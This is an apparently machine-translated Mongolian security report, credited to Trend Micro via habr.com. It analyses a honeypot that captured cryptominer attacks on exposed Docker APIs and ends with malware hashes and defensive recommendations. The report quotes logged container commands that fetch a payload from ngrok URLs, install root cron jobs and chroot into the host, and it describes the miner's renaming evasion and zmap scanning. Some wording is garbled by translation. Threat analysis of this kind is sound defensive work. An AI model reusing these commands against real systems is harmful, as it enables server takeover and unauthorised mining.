Бид аюул заналыг хянах зорилгоор бүтээсэн зөгийн балны сав ашиглан цуглуулсан мэдээлэлд дүн шинжилгээ хийсэн. Мөн бид Docker Hub дээр олон нийтийн нийтэлсэн зургийг ашиглан хуурамч чингэлэг болгон байршуулсан хүсээгүй эсвэл зөвшөөрөлгүй криптовалют олборлогчдын томоохон үйл ажиллагааг илрүүлсэн. Уг зургийг хортой криптовалют олборлогчдод хүргэх үйлчилгээний нэг хэсэг болгон ашиглаж байна.
Нэмж дурдахад хөрш зэргэлдээх нээлттэй контейнерууд болон програмууд руу нэвтрэхийн тулд сүлжээтэй ажиллах програмуудыг суулгасан болно.
Бид зөгийн балны савыг ямар ч аюулгүй байдлын арга хэмжээ авахгүй, дараа нь нэмэлт програм суулгахгүйгээр анхдагч тохиргоотойгоор нь үлдээдэг. Алдаа болон энгийн эмзэг байдлаас зайлсхийхийн тулд Docker-д анхны тохиргоо хийх зөвлөмжүүд байгааг анхаарна уу. Гэхдээ ашигласан зөгийн бал нь савны доторх программ биш харин савлах платформ руу чиглэсэн халдлагыг илрүүлэх зориулалттай сав юм.
Илэрсэн хортой үйл ажиллагаа нь эмзэг байдал шаарддаггүй, мөн Docker хувилбараас хамааралгүй учраас бас анхаарал татаж байна. Буруу тохируулагдсан, тиймээс нээлттэй контейнерийн дүрсийг олох нь халдагчид олон нээлттэй серверүүдийг халдварлахад шаардлагатай зүйл юм.
Хаалтгүй Docker API нь хэрэглэгчдэд өргөн хүрээний үйлдлийг гүйцэтгэх боломжийг олгодог
Зүүн талд хортой програмыг хүргэх арга байна. Баруун талд халдагчийн орчин байгаа бөгөөд энэ нь зургийг алсаас эргүүлэх боломжийг олгодог.
3762 нээлттэй Docker API-ийн улсаар хуваарилалт. 12.02.2019-ны өдрийн Шодан хайлтад үндэслэсэн
Довтолгооны гинж ба ачааны ачааллын сонголтууд
Хортой үйл ажиллагааг зөвхөн зөгийн балны тусламжтайгаар илрүүлсэнгүй. Шоданаас авсан мэдээллээс харахад бид Monero криптовалют олборлох программ хангамжийг байрлуулах гүүр болгон ашигласан буруу тохируулагдсан контейнерийг судалснаас хойш ил гарсан Docker API-уудын тоо (хоёр дахь графикийг харна уу) нэмэгдсэнийг харуулж байна. Өнгөрсөн оны аравдугаар сард (2018 он, одоогийн мэдээлэл
Зөгийн балны гуалин дээр хийсэн судалгаанаас үзэхэд савны дүрсний хэрэглээ нь мөн адил хэрэглээтэй холбоотой болохыг харуулсан
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Таны харж байгаагаар байршуулсан файлууд нь байнга өөрчлөгддөг URL-аас татагддаг. Эдгээр URL-ууд нь богино хугацааны хугацаатай тул хугацаа дууссаны дараа ачааллыг татаж авах боломжгүй.
Ачаа ачаалах хоёр сонголт байдаг. Эхнийх нь уул уурхайн усан сантай холбогддог Линукс (Coinminer.SH.MALXMR.ATNO гэж тодорхойлсон)-д зориулсан эмхэтгэсэн ELF олборлогч юм. Хоёр дахь нь скрипт (TrojanSpy.SH.ZNETMAP.A) бөгөөд сүлжээний хүрээг сканнердах, дараа нь шинэ зорилтуудыг хайхад ашигладаг сүлжээний тодорхой хэрэгслүүдийг олж авах зорилготой юм.
Дусаагчийн скрипт нь хоёр хувьсагчийг тохируулж, дараа нь криптовалютын олборлогчийг байрлуулахад ашигладаг. HOST хувьсагч нь хортой файлууд байрладаг URL-г агуулдаг ба RIP хувьсагч нь байршуулах олборлогчийн файлын нэр (үнэндээ хэш) юм. Хэш хувьсагч өөрчлөгдөх бүрт HOST хувьсагч өөрчлөгддөг. Энэ скрипт нь халдлагад өртсөн сервер дээр өөр ямар ч криптовалют олборлогчид ажиллаж байгаа эсэхийг шалгахыг оролддог.
HOST болон RIP хувьсагчийн жишээ, түүнчлэн өөр уурхайчин ажиллаж байгаа эсэхийг шалгахад ашигладаг кодын хэсэг
Олборлогчийг эхлүүлэхийн өмнө түүний нэрийг nginx болгон өөрчилсөн. Энэ скриптийн бусад хувилбарууд нь олборлогчийн нэрийг Линукс орчинд байж болох бусад хууль ёсны үйлчилгээ болгон өөрчилдөг. Энэ нь ихэвчлэн ажиллаж байгаа процессуудын жагсаалтын эсрэг шалгалтыг тойрч гарахад хангалттай юм.
Хайлтын скрипт нь мөн онцлог шинж чанартай байдаг. Энэ нь шаардлагатай хэрэгслүүдийг байршуулахын тулд ижил URL үйлчилгээтэй ажилладаг. Тэдгээрийн дотор сүлжээг сканнердах, нээлттэй портуудын жагсаалтыг авахад ашигладаг zmap хоёртын хувилбар юм. Скрипт нь олсон үйлчилгээтэй харилцах, тэдгээрээс баннер хүлээн авахад ашигладаг өөр хоёртын файлыг ачаалж, олсон үйлчилгээний талаарх нэмэлт мэдээллийг (жишээлбэл, түүний хувилбар) тодорхойлоход ашигладаг.
Скрипт нь сканнердах зарим сүлжээний хүрээг урьдчилан тодорхойлдог боловч энэ нь скриптийн хувилбараас хамаарна. Энэ нь скан хийхээс өмнө үйлчилгээнүүдийн зорилтот портуудыг (энэ тохиолдолд Docker) тохируулдаг.
Боломжит зорилтууд олдмогц тэднээс баннерууд автоматаар арилдаг. Скрипт нь мөн үйлчилгээ, програм, бүрэлдэхүүн хэсэг эсвэл сонирхсон платформоос хамааран зорилтуудыг шүүдэг: Redis, Jenkins, Drupal, MODX,
Довтолгооны вектор нь Докерын дүрс бөгөөд дараагийн хоёр кодоос харж болно.
Дээд талд нь хууль ёсны үйлчилгээ болгон нэрийг нь өөрчлөх, доод талд нь сүлжээг скан хийхэд zmap хэрхэн ашиглагддаг талаар бичсэн байна.
Дээд талд нь урьдчилан тодорхойлсон сүлжээний мужууд, доод талд нь Docker зэрэг үйлчилгээ хайх тусгай портууд байна.
Дэлгэцийн агшингаас харахад уулын буржгар зургийг 10 сая гаруй удаа татсан байна
Төрөл бүрийн протоколоор файл дамжуулахад зориулагдсан нөөцийн хэмнэлттэй CLI хэрэгсэл болох Alpine Linux болон curl дээр тулгуурлан та бүтээх боломжтой.
Энэ зураг (alpine-curl) нь өөрөө хор хөнөөлтэй биш гэдгийг анхаарах нь чухал боловч дээр дурдсанчлан хортой функцийг гүйцэтгэхэд ашиглаж болно. Үүнтэй төстэй Docker зургуудыг хортой үйлдэл хийхэд ашиглаж болно. Бид Докертой холбогдож, энэ асуудлаар тэдэнтэй хамтран ажилласан.
зөвлөмж
Энэ нийтлэлд авч үзсэн үйл явдал нь аюулгүй байдлыг эхнээс нь анхаарч үзэх шаардлагатайг онцлон тэмдэглэж, үүнд дараах зөвлөмжүүд багтсан болно.
- Системийн администраторууд болон хөгжүүлэгчдэд: Бүх зүйл зөвхөн тодорхой сервер эсвэл дотоод сүлжээний хүсэлтийг хүлээн авахаар тохируулагдсан эсэхийг шалгахын тулд API тохиргоогоо үргэлж шалгаарай.
- Хамгийн бага эрхийн зарчмыг баримтал: чингэлэгийн дүрсийг гарын үсэг зурж, баталгаажуулж, чухал бүрэлдэхүүн хэсгүүдэд хандах хандалтыг хязгаарлах (контейнер хөөргөх үйлчилгээ) болон сүлжээний холболтод шифрлэлт нэмнэ.
- Дагах
зөвлөмжүүд аюулгүй байдлын механизмыг идэвхжүүлэх, жишээлбэл.Docker-аас болон суурилуулсанаюулгүй байдлын онцлог . - Контейнер дээр ажиллаж байгаа процессуудын талаар нэмэлт мэдээлэл авахын тулд (жишээ нь, хууран мэхлэлт илрүүлэх эсвэл эмзэг байдлыг хайх) автоматаар ажиллах хугацаа, зургийг сканнердах боломжтой. Аппликешны хяналт болон бүрэн бүтэн байдлын хяналт нь сервер, файл болон системийн хэсэгт гарсан хэвийн бус өөрчлөлтийг хянахад тусалдаг.
Trendmicro нь DevOps-ын багуудад найдвартай бүтээх, хурдан гаргах, хаана ч ажиллуулахад тусалдаг. Trend Micro
Бууйлтын шинж тэмдэг
Холбогдох хэшүүд:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
дээр
Эх сурвалж: www.habr.com